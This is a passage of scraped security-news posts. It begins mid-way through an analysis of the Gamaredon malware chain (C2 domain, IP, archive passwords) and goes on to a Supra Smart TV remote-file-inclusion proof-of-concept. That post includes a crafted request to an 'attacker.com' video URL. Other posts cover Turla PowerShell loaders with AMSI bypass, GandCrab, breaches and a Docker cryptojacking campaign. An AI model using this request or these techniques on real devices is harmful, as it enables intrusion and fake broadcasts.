  • the “20261” file in “%TEMP%\7ZipSfx.000\Document.docx”
Figure 5. Script content in  “15003.cmd” file

At the same time, the extracted document will be shown in order to divert the user attention and to continue the infection unnoticed. This document, written in Ukraine language, contains information about a criminal charge.

Figure 6. Fake document to divert attention on malware execution
Figure 7. Execution of “winupd.exe” (SFX) and relative password (uyjqystgblfhs)

Instead, exploring the LNK file is possible to see it’s able to start the “winupd.exe” file, with a particular parameter: %USERPROFILE%\winupd.exe -puyjqystgblfhs. This behavior indicates the “winupd.exe” executable is another Self Extracting Archive, but this time it is password protected.

Stage 2

Hashfd59b1a991df0a9abf75470aad6e2fcd67c070bfccde9b4304301bc4992f678e
ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:bGKUQ8Lj7S6Jr1ye4SM4vzxn3k1jQ GujR:biJr1yeNxJkro

Table 2. Information about second SFX file

When launched, it extracts its content in “%TEMP%\RarSFX0\”, then executes the “setup.vbs” script, which contains only two code lines. So, the execution flow moves on “1106.cmd”.

Figure 8. Content of “setup.vbs” script
Figure 9. Content of “%APPDATA%\Local\Temp\RarSFX0” after “winupd.exe” (SFX) extraction

The source code of “1106.cmd” is full of junk instructions. However, in the end it performs a simple action: it writes a new VBS script in “%APPDATA%\Microsoft\SystemCertificates\My\Certificates\” . This script tries to download another malicious file from “http://bitvers.ddns[.net/{USERNAME}/{DATE}/index.html”.  Performing many researches abot this server we noticed the continuously modification of associated records. Indeed, the attacker has changed many time the domain names in the latest period. Moreover, querying the services behind the latest associated DNS record the host responds with “403 Forbidden” message too, indicating the infrastructure may still be operative.

Figure 10. Information about C2 and relative DNS

The scripts creates a new scheduled task in order to periodically execute (every 20 mins) the previous VBS script.

Figure 11. POST request sent to C2 with victim machine information

Also, it collects all the information about the victim’s system using the legit “systeminfo” Microsoft tool and sends them to the remote server through a POST request using the “MicrosoftCreate.exe” file, which actually is the legit “wget” utility. The response body will contain a new executable file, named “jasfix.exe”, representing the new stage.

Stage 3

Hashc479d82a010884a8fde0d9dcfdf92ba9b5f4125fac1d26a2e36549d8b6b4d205
ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:Gfxwgmyg5EOJ+IIpBz2GAROm560XVEC1Ng MdfaQbhUfEIg+m:GJpgIdPzeRBJVEC1CMd

Table 3. Information about third SFX file

After few researches, we were able to retrieve the “jasfix.exe” file, the next stage of the infection chain. After downloading it, we notice that it is another SFX archive other files.

Figure 12. Content of “jasfix.exe” (SFX) downloaded from the C2

The first file to be executed is “20387.cmd” that renames the “win.jpg” into “win.exe”, another password protected SFX.

Stage 4

Hash28eff088a729874a611ca4781a45b070b46302e494bc0dd53cbaf598da9a6773
ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:9GKUQ8vCTAaaJVssTk3OwO+vl+3yt6Xf IAR:9vaJes2Ocl7t9S

Table 4. Information about fourth SFX file

This latest SFX archive follows the typical pattern of the Gamaredon archives Matryoshka, where the “.cmd” file is in designed to decrypt and run next stage. This time using the string “gblfhs” as password.

Figure 13. Script to rename “win.jpg” into “win.exe”, decrypt and run next stage
Figure 14. Content of “win.exe” (last SFX of infection)

However, the file named “win32.sys” is particularly interesting: it actually is a PE32 executable file. Exploring the “.rsrc” section of the PE32 executable, we noticed different “.class” files. Two of them are named “VncCanvas” and “VncViewer”. These files are part of a legit Remote Administration Tool (RAT) named UltraVNC, available at this link.

Figure 15. Content of “win32.sys”

The “win.exe” SFX archive contains other interesting files too: one of them is an “.ini” configuration file containing all the parameters and the password used by the UltraVNC tool.

Figure 16. Configuration file used by “win32.sys” (Custom ultraVNC)

Finally, the RAT tries to establish a connection to the “torrent-vnc[.ddns[.net” domain, headed to an endpoint reachable on 195.88.208.51, a VPS hosted by the Russian provider IPServer.

Figure 17. C2 and relative port used by RAT

Conclusion

This recent attack campaign shows the Gamaredon operation are still ongoing and confirms the potential Russian interest about infiltrating the East European ecosystem, especially the Ukranian one. The techniques and the infection patterns the Group is using is extremely similar to the other attacks spotted in the past months of 2019, showing the Matryoshka structure to chain SFX archives, typical of their implant, but still effective and not easily detectable by several antivirus engines.

Also, digging into this infection chain, we noticed the come back of third party RATs as payload, a Gamaredon old habit that the usage of the custom-made Pterodo backdoor replaced few times ago.

Acknowledgement: special thanks to @JAMESWT_MHT for info and samples.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

https://blog.yoroi.company/research/the-russian-shadow-in-eastern-europe-a-month-later/

Pierluigi Paganini

(SecurityAffairs – Gamaredon, state-sponsored hacking)

The post A month later Gamaredon is still active in Eastern Europe appeared first on Security Affairs.

macOS zero-day in Mojave could allow Synthetic Clicks attacks

A security expert found a flaw could be exploited to bypass macOS security and privacy features by using synthetic clicks.

The popular white hat hacker Patrick Wardle, co-founder and chief research officer at Digita Security, discovered a vulnerability that could be exploited to bypass security warnings by performing ‘Synthetic Clicks’ on behalf of users without requiring their interaction.

In June, Apple introduced a core security feature in MacOS that force applications into taking permission from users before accessing sensitive data or components on the system (i.e. device camera, microphone, location data, photos, messages, and browsing history).

Wardle disclosed the issue over the weekend during the meeting arranged by his company.

Wardle explained that a “subtle code-signing issue” in macOS could allow the hack of any trusted application to generate synthetic clicks, bypassing the core security feature introduced in 2018. Malware developers and hackers might use synthetic mouse-click attacks to emulate human behavior in approving security warnings.

The attack could be triggered by an attacker with local access to the device when the screen is dimmed, this means that it could be very difficult to spot.

According to Wardle, no special privileges are required to carry out the attack.

The attack ties the Transparency Consent and Control (TCC) system, which maintains databases for privacy control settings. The system also includes a compatibility database, stored in the AllowApplicationsList.plist. This database is used to manage access to protected functions for specific versions of apps with specific signatures, it works as a sort of whitelist.

Wardle explained that an attacker can modify one of the applications in the whitelist and execute it to generate synthetic clicks. An attacker can download a modified version of the targeted app and run it. Apple is not able to detect the changes to the targeted app due to a flaw in code validation checks.

 synthetic clicks

Wardle discovered several issued in macOS that could be exploited to allow synthetic clicks, he publicly disclosed one in September 2018 and another one at DefCon 2018.

The security updates released by Apple over the time failed in completely addressing the issue allowing the expert to launch synthetic click attacks. Wardle reported his discovery to Apple a few days ago that acknowledged the problem and likely is already working to address it.

Waiting for a fix, macOS users could install the GamePlan, the endpoint protection product designed by Digita Security, that prevents synthetic clicks.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Apple, zero-day)

The post macOS zero-day in Mojave could allow Synthetic Clicks attacks appeared first on Security Affairs.

Australian teenager hacked into Apple twice for a job

What can Apple ‘s fan do to work with his favorite company? A teen opted out to hack it twice.

A 17-year-old teenager Australian teenager decided to attract the attention of the tech giant by gaining access to its mainframe with false credentials.

The teen was dreaming of a job in Apple and was convicted that the actions meaning much more of a static CV or applications for internship.

Unfortunately, the teen was identified and he has been found guilty of hacking twice into Apple’s infrastructure in 2015 and 2017. 

Apple SQLite bugs

“The boy, who is now 17, faced the Adelaide Youth Court and pleaded guilty to multiple computer hacking charges.” reported the Australian ABC website.

“The court heard he and another teenager from Melbourne hacked into the technology giant’s mainframe in December 2015 and then again in early 2017 and downloaded internal documents and data.”

The teenager is from Adelaide, Australia, and violated an Apple mainframe by creating false credentials, he was helped by another young hacker. The lawyer of the teen, Mark Twiggs, explained to the court that his client had no bad intentions and due to his young age he was not aware of the severe consequences.

This offending started when my client was 13 years of age, a very young age,” said Twiggs.

“He had no idea about the seriousness of the offence and hoped that when it was discovered that he might gain employment at this company.
“He didn’t know this was going to lead to anything other than a job at the end of it, [this] happened in Europe, a similar person got caught and they ended up getting employed by the company.”

The good news is that Apple did not incur any financial or intellectual loss from the hack.

Magistrate David White only placed the teenager on a $500 bond to be of good behaviour for nine months.

“He is clearly someone who is a gifted individual when it comes to information technology, that being said, those who have this advantage of being gifted doesn’t give them the right to abuse that gift,” said the Magistrate.

“The manner in which the world functions is one that is heavily reliant on computer technology and those who unlawfully interfere with those systems can do enormous amounts of damage.”

Magistrate White asked the guy to use his talent in a better way in the future avoiding to violate any law.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Apple, hacking)

The post Australian teenager hacked into Apple twice for a job appeared first on Security Affairs.

Expert shows how to Hack a Supra Smart Cloud TV

Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication

Summary:
Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setUri&uri=URI

Supra Smart Cloud TV

Technical Observation: 
We are abusing `openLiveURL()` which allows a local attacker to broadcast video on supra smart cloud TV. I found this vulnerability initially by source code review and then by crawling the application and reading every request helped me to trigger this vulnerability.

Vulnerable code:

 function openLiveTV(url)
{
$.get("/remote/media_control", {m_action:'setUri',m_uri:url,m_type:'video/*'},
function (data, textStatus){
if("success"==textStatus){
alert(textStatus);
}else
{
alert(textStatus);
}
});
}

Vulnerable request:

GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

To trigger the vulnerability you can send a crafted request to the URL,

http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

Although the above mention URL takes (.m3u8) format based video. We can use `curl -v -X GET` to send such request, typically this is an unauth remote file inclusion. An attacker could broadcast any video without any authentication, the worst case attacker could leverage this vulnerability to broadcast a fake emergency message (Scary right?)

Although, this is still unpatched because I didn’t find any-way to contact the vendor.

The above video PoC shows a successful demonstration of this attack where Mr.Steve Jobs speech is suddenly replaced with attacker fake “Emergency Alert Message” this may make end user panic.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original post at:

https://www.inputzero.io/2019/06/hacking-smart-tv.html

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – hacking, Smart Cloud TV)

The post Expert shows how to Hack a Supra Smart Cloud TV appeared first on Security Affairs.

Google is taking action on deceptive installation tactics for Chrome Browser Extensions

Google aims at eliminating the use of deceptive installation tactics among Chrome browser extensions introducing a new policy.

Google announced a new policy for Chrome browser extensions to eliminate the use of deceptive installation tactics.

The additional changes are part of the Project Strobe presented by Google in October 2018 in the aftermath of the data breach that exposed data of over 500,000 users of its Google+.

Google aims at ensuring that all Chrome extensions are trustworthy by default

Google says that users’ trust in extensions is greatly influenced by the path to downloading an extension. A single bad experience could affect users’ interest in these applications. 

“Setting the right expectations for what an extension does, from the start, helps create a healthy and thriving ecosystem of extensions, developers, and passionate users.” states Google.

“Last year, to improve user transparency we deprecated inline installation and began requiring all extension installs to go through the Chrome Web Store. This change has helped reduce user complaints about unwanted extensions by 18 percent.”

Unfortunately, Google still receives user feedback about deceptive extension install flows. The company is prohibiting extensions that benefit from deceptive install tactics with the following policy:

Extensions must be marketed responsibly. Extensions that use or benefit from deceptive installation tactics will be removed from the Chrome Web Store.

Deceptive installation tactics include:

  • Unclear or inconspicuous disclosures on marketing collateral preceding the Chrome Web Store item listing.
  • Misleading interactive elements as part of your distribution flow. This includes misleading call-to-action buttons or forms that imply an outcome other than the installation of an extension.
  • Adjusting the Chrome Web Store item listing window with the effect of withholding or hiding extension metadata from the user.

Developers are asked to audit their install traffic to ensure it is compliant before July 1st, 2019.

Google also introduced two additional restrictions on Chrome browser extensions, the most important one requires the use of the “minimum set of permissions necessary” when asking for access to data. Below the two restrictions:The tech giant added the following Chrome Web Store policies.

  1. We’re requiring extensions to only request access to the appropriate data needed to implement their features.  All extensions will now be required to use the “minimum set of permissions necessary” when asking for access to data. If there is more than one permission that could be used to implement a feature, developers must ask for permissions that could give them access to the least amount of data.
  2. We’re requiring more extensions to post privacy policies, including extensions that handle personal communications and user-provided content.  The company is requiring more extensions to post privacy policies in the Chrome Web Store. Even if this requirement is already in place for extensions that require access to “personal and sensitive user data,” now Google is extending the requirement to those Chrome browser extensions that need access to personal communication or user-provided content,


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Chrome Browser Extensions, Google)

The post Google is taking action on deceptive installation tactics for Chrome Browser Extensions appeared first on Security Affairs.

Google outages in Eastern US affected Gmail, G-Suite, YouTube, and more

Network problems on the East Coast of the US caused massive outages in Google Cloud and the Google Compute Engine, impacting all the services that rely on them.

The network issued caused connection problems to several Google services, including G Suite, Gmail, YouTube. Users also experience problems in accessing third-party services such as Snapchat and Discord.

I discovered the problem because I was not able to access Analytics data for my blog. I immediately visited the Google’s service status page that was reporting a network congestion issue affecting Google Cloud Networking and the Google Compute Engine on the east coast of the U.S.

“We continue to experience high levels of network congestion in the eastern USA, affecting multiple services in Google Cloud, G Suite and YouTube. Users may see slow performance or intermittent errors. Our engineering teams have completed the first phase of their mitigation work and are currently implementing the second phase, after which we expect to return to normal service. We will provide an update by Sunday, 2019-06-02 16:00 US/Pacific.” reported the company service status page.

As usual, the next step is to visit the DownDetector.com website to better understand the extent of the problem. The page of the website for Google Cloud outage map on DownDetector.com confirmed the outages affecting the eastern U.S. as well as some users in Europe and in San Francisco.

Google Cloud Storage outage.jpg

At the time Google has resolved the issue, as reported on the service status page, and is investigating the incident:

“The network congestion issue in eastern USA, affecting Google Cloud, G Suite, and YouTube has been resolved for all affected users as of 4:00pm US/Pacific.” states Google.

“We will conduct an internal investigation of this issue and make appropriate improvements to our systems to help prevent or minimize future recurrence. We will provide a detailed report of this incident once we have completed our internal investigation. This detailed report will contain information regarding SLA credits.”


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Google outages, IT)

The post Google outages in Eastern US affected Gmail, G-Suite, YouTube, and more appeared first on Security Affairs.

Threat actors abuse Microsoft Azure to Host Malware and C2 Servers

Microsoft Azure cloud services are being abused by threat actors to host malware and as command and control (C&C) servers.

Threat actors look with great interest at cloud services that could be abused for several malicious purposes, like storing malware or implementing command and control servers.

Now it seems to be the Microsoft Azure’s turn, recently experts reported several attacks leveraging the platform to host tech-support scam and phishing templates.

microsoft azure

Security researchers already spotted some malware hosted on the Microsoft Azure platform.

Researchers at AppRiver observed attackers deploying malware on the Microsoft Azure platform, the bad news is that those malicious codes were not removed after some weeks, on May 29.

“Now the attacks have escalated to malware being hosted on the Azure service. Not only is Azure hosting malware, it is also functioning as the command and control infrastructure for the malicious files” reads the analysis published by AppRiver.

“On May 11, 2019, malware researchers @JayTHL & @malwrhunterteam discovered the malicious software on Azure. It was reported to Microsoft on May 12 for abuse via ticket #SIR0552640.  However, the original malware (plus additional samples uploaded since) still resided on the Azure site as of May 29, 2019 – 17 days later.”

Experts pointed out that Azure is failing to detect the malware hosted on Microsoft’s servers.

“No service is infallible to being attacked or exploited. It’s evident that Azure is not currently detecting the malicious software residing on Microsoft’s servers. However, if a user attempts to download the executables, Windows Defender does detect the malicious files.”

In one case, a sample named searchfile.exe was uploaded to VirusTotal on April 26, 2019. Even is Windows Defender detects the malware its presence on Azure is not currently blocked. Unfortunately, experts reported many other similar cases.

Experts believe that this trend will continue to grow, threat actors will not only abuse Microsoft Azure, but other cloud services (i.e. Google Drive, Dropbox, and Amazon) will be exploited by attackers to avoid detection.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Microsoft Azure, hacking)

The post Threat actors abuse Microsoft Azure to Host Malware and C2 Servers appeared first on Security Affairs.

Leicester City Football Club disclosed a card breach

Leicester City Football Club disclosed a card breach that affected its website, hackers stole payment card data, including card numbers and CVVs.

Leicester City Football Club revealed that hackers have breached its website (https://shop.lcfc.com/) and stole credit card data of people that bought products disclosed a card breach that affected its website, hackers stole payment card data, including card numbers and CVVs.

leicester city

According to the club, the card breach affected some users between April 23 and May 4, the company already notified the supporters whose details were compromised.

The club also informed the authorities and the Information Commissioners Office (ICO), it also launched an immediate investigation.

“Upon discovery of the breach, the security of our retail platform was immediately restored and appropriate measures were taken to ensure the security of all other online assets.” reads the statement issued by the company.

Exposed data includes card number, name of card holder, expiry date and CVV.

“Technical investigations are still ongoing, but we can confirm that as a result of the incident your payment card information was compromised. This includes your card number, name of card holder, expiry date and CVV. We can confirm that your SecureCode was not compromised. That information is needed to attempt to conduct transactions using your account.” reads the email sent to the customers.

At the time of writing, there is information about the attack and the way hackers breached the website of the English club, it is also not clear how many supporters have been impacted.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Leicester City Football Club, card breach)

The post Leicester City Football Club disclosed a card breach appeared first on Security Affairs.

ProtonMail denies that it spies on users for government agencies

The popular privacy-focused email service ProtonMail has been accused of offering voluntarily real-time surveillance assistance to law enforcement.

The popular privacy-focused email service ProtonMail made the headlines because it has been accused of supporting real-time surveillance carried out by law enforcement.

protonmail

On May 10, while Stephan Walder, a public prosecutor and head of the Cybercrime Competence Center in Switzerland’s Canton of Zurich, was giving a presentation at an event when the Swiss lawyer Martin Steiger live-tweeted from the event that Walder incidentally mentioned ProtonMail as a service provider that voluntarily offers support to law enforcement.

Steiger said that ProtonMail offers voluntary support for real-time surveillance without requiring an order from a federal court.

“Email service provider ProtonMail, based in Switzerland, offers assistance for real-time surveillance: Voluntarily!” reads the post published by Stieger.

Steiger pointed out the company provided metadata and so-called secondary data that could be used by law enforcement and intelligence agencies for surveillance purposes.

“Metadata or secondary data that is available must be provided. On the other hand, ProtonMail, as a provider of derived communication services, has in principle no obligation for real-time surveillance. Art. 26 para. 4 SPTA provides such obligation only for providers of telecommunications services such as Swisscom or UPC.” continues the post.

“There is currently no evidence that ProtonMail is a provider of derived communications services with more extensive surveillance obligations. ProtonMail would therefore not have to voluntarily provide assistance for real-time surveillance.”

Steiger pointed out that ProtonMail the company is subject to Swiss local surveillance laws, but it’s not subject to more extensive surveillance obligations.

According to the transparency report published by the company, ProtonMail could conduct real-time surveillance for the authorities and it also mentions a current case:

“In April 2019, at the request of the Swiss judiciary in a case of clear criminal conduct, we enabled IP logging against a specific user account which is engaged in illegal activities which contravene Swiss law. Pursuant to Swiss law, the user in question will also be notified and afforded the opportunity to defend against this in court before the data can be used in criminal proceedings.“s.

Walder said that Steiger has misunderstood his speech, but the lawyer believes that the situation is exactly the one he described in the post.

ProtonMail denied Steiger’s claims and published a post to clarify that it only supports authorities when presented by an order from a Swiss court or prosecutor.

ProtonMail does not voluntarily offer assistance as alleged. We only do so when ordered by a Swiss court or prosecutor, as we are obligated to follow the law in all criminal cases. Furthermore, ProtonMail’s end-to-end encryption means we cannot be forced by a court to provide unencrypted message contents.” reads the blog post.

ProtonMail cannot be used for any purposes that are illegal under Swiss law. Not only is this against our terms and conditions, we are also obligated by law to assist police investigations in criminal cases. However, the claim that we do this voluntarily is entirely false.”

According to ProtonMail, Steiger’s interpretation of the law is different from the one taken by the Swiss authorities.

The company clarified that it does not agree with the interpretation taken by some branches of the Swiss government. Therefore, we have asked the Swiss Federal Administrative Tribunal to rule on the appropriate interpretation of the law, and we will appeal to the Swiss Supreme Court if necessary.

ProtonMail threatens to take legal action for defamation pursuant to art. 174 of the Swiss Criminal Code.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – privacy, surveillance)

The post ProtonMail denies that it spies on users for government agencies appeared first on Security Affairs.

Security Affairs newsletter Round 216 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

https://www.surveymonkey.com/r/EUBloggerAwards2018

Police seized Bestmixer, the mixing service washed at least $200 million in a year
Remarks on NATO and its approach to the cyber offensive
Sectigo says that most of certificates reported by Chronicle analysis were already revoked
BlueKeep scans observed from exclusively Tor exit nodes
Crooks leverages .htaccess injector on Joomla and WordPress sites for malicious redirects
First American Financial exposed 16 years worth of personal and financial documents
Hacker breached Perceptics, a US maker of license plate readers
APT10 is back with two new loaders and new versions of known payloads
DuckDuckGo Address Bar Spoofing
Internet scans found nearly one million systems vulnerable to BlueKeep
Shade Ransomware is very active outside of Russia and targets more English-speaking victims
Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw
All Docker versions affected by an unpatched race condition issue
Google white hat hacker found code execution flaw in Notepad
HawkEye Keylogger is involved in attacks against business users
News aggregator Flipboard disclosed a data breach
TA505 is expanding its operations
Using Public Wi-Fi? Your data can be hacked easily! Heres How…
Checkers double drive-thru restaurants chain discloses card breach
Convert Plus WordPress plugin flaw allows hackers to create Admin accounts
Emissary Panda APT group hit Government Organizations in the Middle East
Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers
VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs
0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler
HiddenWasp, a sophisticated Linux malware borroes from Mirai and Azazel
Microsoft warns for the second time of applying BlueKeep patch
Security expert shows how to bypass macOS Gatekeeper
The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains
Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows
Cryptojacking campaign uses Shodan to scan for Docker hosts to hack
GandCrab operators are shutting down their operations
Russian military plans to replace Windows with Astra Linux



Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 216 – News of the week appeared first on Security Affairs.

ESET analyzes Turla APT’s usage of weaponized PowerShell

Turla, the Russia-linked cyberespionage group, is weaponizing PowerShell scripts and is using them in attacks against EU diplomats.

Turla (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON), the Russia-linked APT group, is using weaponized PowerShell scripts in attacks aimed at EU diplomats.

Turla group has been active since at least 2007 targeting government organizations and private businesses.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

Turla is back, in a recent wave of attacks, the cyberspies targeted diplomatic entities in Eastern Europe.

“To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. This allows them to bypass detection that can trigger when a malicious executable is dropped on disk.” reads the report published by ESET.

The PowerShell scripts used by Turla in recent attacks allow direct, in-memory loading and execution of malicious executables and libraries avoiding detection.

Turla first used PowerShell in 2018, at the time experts from Kaspersky Labs collected evidence that demonstrated overlaps between the activity of Russian APT groups Turla and Sofacy. 

Turla attacks

Kaspersky Lab said the APT was experimenting with PowerShell in-memory loads to bypass security protections, at the time the loader used by the cyberspies was based on the legitimate PoshSec-Mod software. Anyway, experts believe that due to the presence of bugs in the code it would often crash.

ESET believes that now the problems have been solved and the Turla threat actors leverage the PowerShell scripts to load an array of malware.

“The PowerShell scripts are not simple droppers; they persist on the system as they regularly load into memory only the embedded executables.” continues the report.

We have seen Turla operators use two persistence methods:

  • A Windows Management Instrumentation (WMI) event subscription
  • Alteration of the PowerShell profile (profile.ps1 file).”

When the persistence is implemented through WMI, attackers create two WMI event filters and two WMI event consumers. The consumers are command lines launching base64-encoded PowerShell commands that load a PowerShell script stored in the Windows registry.

The second method used by the group consists of altering the PowerShell profile that is a script that runs when PowerShell starts.

In both cases the decryption of payloads stored in the registry is done using the 3DES algorithm. Once decrypted, a PowerShell reflective loader then comes into action.

“The payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework” reads the analysis.

“The executable is hardcoded in the script and is loaded directly into the memory of a randomly chosen process that is already running on the system,”

Attackers avoid targeting processes that could be specifically referred as legitimate defense solutions, such as the Kaspersky anti-virus protection software.

In some samples, Turla attackers have modified the PowerShell script in order to bypass the Antimalware Scan Interface (AMSI) implemented by Windows.

“This is an interface allowing any Windows application to integrate with the installed antimalware product. It is particularly useful for PowerShell and macros.” continues the report.

“They did not find a new bypass but re-used a technique presented at Black Hat Asia 2018 in the talk The Rise and Fall of AMSI. It consists of the in-memory patching of the beginning of the function AmsiScanBuffer in the library amsi.dll.”

The attackers are also able to modify the PowerShell script, in particular, the AmsiScanBuffer in a way that the antimalware product will not receive the buffer, which prevents any scanning.

The PowerShell loader is used to lauch malware, one of these malicious codes is a backdoor based on the RPC protocol.

Turla also has also a lightweight PowerShell backdoor in its arsenal, tracked as PowerStallion it uses cloud storage as C2 server.

A few weeks ago, ESET researchers discovered a Turla’s backdoor tracked as LightNeuron, that has been specifically developed to hijack Microsoft Exchange mail servers.

ESET confirmed that the PowerShell scripts have been used involved in campaigns aimed at political targets in Eastern Europe. According to the researchers the same scripts are also used globally against other targets in Western Europe and the Middle East.

“Finally, the usage of open-source tools does not mean Turla has stopped using its custom tools. The payloads delivered by the PowerShell scripts, the RPC backdoor and PowerStallion, are actually very customized. Our recent analysis of Turla LightNeuron is additional proof that this group is still developing complex, custom malware.” concludes the report.

ESET report includes technical details and IoCs associated with recent attacks.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Turla, hacking)

“”

The post ESET analyzes Turla APT’s usage of weaponized PowerShell appeared first on Security Affairs.

GandCrab operators are shutting down their operations

GandCrab first appeared in the threat landscape in early 2018 and continuously evolved over time. Now operators are shutting down their operations.

Early 2018, experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service dubbed GandCrab. advertised in Russian hacking community on the dark web. The GandCrab was advertised in Russian hacking community, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.

In more than one year its operators released several versions with numerous enhancements, but now they are shutting down their operation and affiliates are being told to stop distributing the ransomware.

In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.

Security researchers Damian and David Montenegro, who follow the evolution of the GandCrab since its appearance, the GandCrab operators announced their decision of shutting down their operation in a post in popular hacking forums:

The operators revealed they have generated more than $2 billion in ransom payments, earning on average of $2.5 million dollars per week. The operators revealed to have earned a net of $150 million that now have invested in legal activities.

GandCrab shutdown

Anyway, experts believe that the claims of $2 billion are not real, below an excerpt from a post published by Bleeping Computer:

“While the operators behind GandCrab most likely made many millions of dollars, the claims of $2 billion in ransom payments are very likely to be untrue.”

Operators will no more promote the GandCrab ransomware and asked the affiliates to stop distributing it within 20 days.

They are also warning victims that time is running out and they have to pay the ransom as soon as possible to avoid to lose their file forever.

It is not clear if the operators will release the keys after they will go out of the business.

Stay tuned …

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – GandCrab ransomware, malware)


The post GandCrab operators are shutting down their operations appeared first on Security Affairs.

Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows

Apple released security updates for Windows versions of iTunes and iCloud, to address recently disclosed SQLite and WebKit security flaws.

Apple released security updates to address recently disclosed SQLite and WebKit security vulnerabilities affecting Windows versions of iTunes and iCloud.

Apple released iTunes for Windows 12.9.5 that addresses a total of 25 flaws, four SQLite issues and 21 vulnerabilities in WebKit.

Apple addressed the SQLite vulnerabilities tracked as CVE-2019-8577 and CVE-2019-8602 that could be exploited by an application to gain elevated privileges.

Another SQLite bug tracked as CVE-2019-8600, is a memory corruption vulnerability that could be exploited to execute arbitrary code by sendind maliciously crafted SQL query to the vulnerable install.

The fourth SQLite flaw, tracked as CVE-2019-8598, is an input validation issue that could allow an application to read restricted memory.

All the SQLite issues were reported by Omer Gull from Checkpoint Research.

The CVE-2019-8607 flaw in WebKit is an out-of-bounds read that could lead to the disclosure of process memory when processing maliciously crafted web content.  The flaw was reported by Junho Jang and Hanul Choi of LINE Security Team.

The other flaws in WebKit addressed by Apple could lead to arbitrary code execution during the processing of maliciously crafted web content.  

The security advisory published by Apple is available here.

The tech giant also released iCloud for Windows 7.12 to address all these security issues. 

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Apple, iCloud, iTunes)

The post Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows appeared first on Security Affairs.

Cryptojacking campaign uses Shodan to scan for Docker hosts to hack

A new cryptojacking campaign was spotted by experts at Trend Micro, crooks are using Shodan to scan for Docker hosts with exposed APIs.

Threat actors are using the popular Shodan search engine to find Docker hosts and abuse them in a crypojacking campaign. Attackers leverage self-propagating Docker images infected with Monero miners and scripts that use of Shodan to find other vulnerable installs and compromise them.

The experts discovered the attacks after they have set up a machine that simulated a Docker host with an exposed API.

“We discovered that the images are first deployed using a script (ubu.sh, detected as PUA.Linux.XMRMiner.AA.component) that checks hosts with publicly exposed APIs. It then uses Docker commands (POST /containers/create) to remotely create the malicious container. This script also starts an SSH daemon inside the container for remote communication.” reads the analysis published by Trend Micro.

“The script then calls a Monero coin-mining binary, darwin (detected as PUA.Linux.XMRMiner.AA), to run in the background. As with all cryptocurrency miners, it uses the resources of the host system to mine cryptocurrency (Monero in this instance) without the owner’s knowledge.”

docker cryptojacking

